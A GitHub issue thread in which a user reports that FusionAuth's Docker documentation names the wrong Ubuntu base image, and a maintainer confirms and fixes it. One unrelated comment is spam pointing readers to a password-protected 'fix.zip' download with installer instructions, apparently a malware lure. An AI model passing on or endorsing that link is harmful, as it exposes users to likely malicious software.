### ISSUE TITLE
Change the Docker base image present on the documentation

### ISSUE THREAD

**Issue by stuzzo** [FusionAuth/fusionauth-site#3218]
Reading this https://fusionauth.io/docs/get-started/download-and-install/docker#custom-docker-images, I saw this sentence 

> Just as the FusionAuth Docker image is based on the ubuntu:jammy image, you can build a Docker file which is based on the fusionauth/fusionauth-app:latest image

If I'm not wrong, in the latest releases, the base image is based on ubuntu:noble.

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mooreds** [comment]
You are absolutely correct. From [the dockerfile](https://github.com/FusionAuth/fusionauth-containers/blob/main/docker/fusionauth/fusionauth-app/Dockerfile):

```
FROM --platform=$BUILDPLATFORM ubuntu:noble AS build
```

We'll update the doc, thanks!

**Comment by mooreds** [comment]
Closed under https://github.com/FusionAuth/fusionauth-site/pull/3219 (deploying as we speak). 

Thanks again for filing the issue @stuzzo !
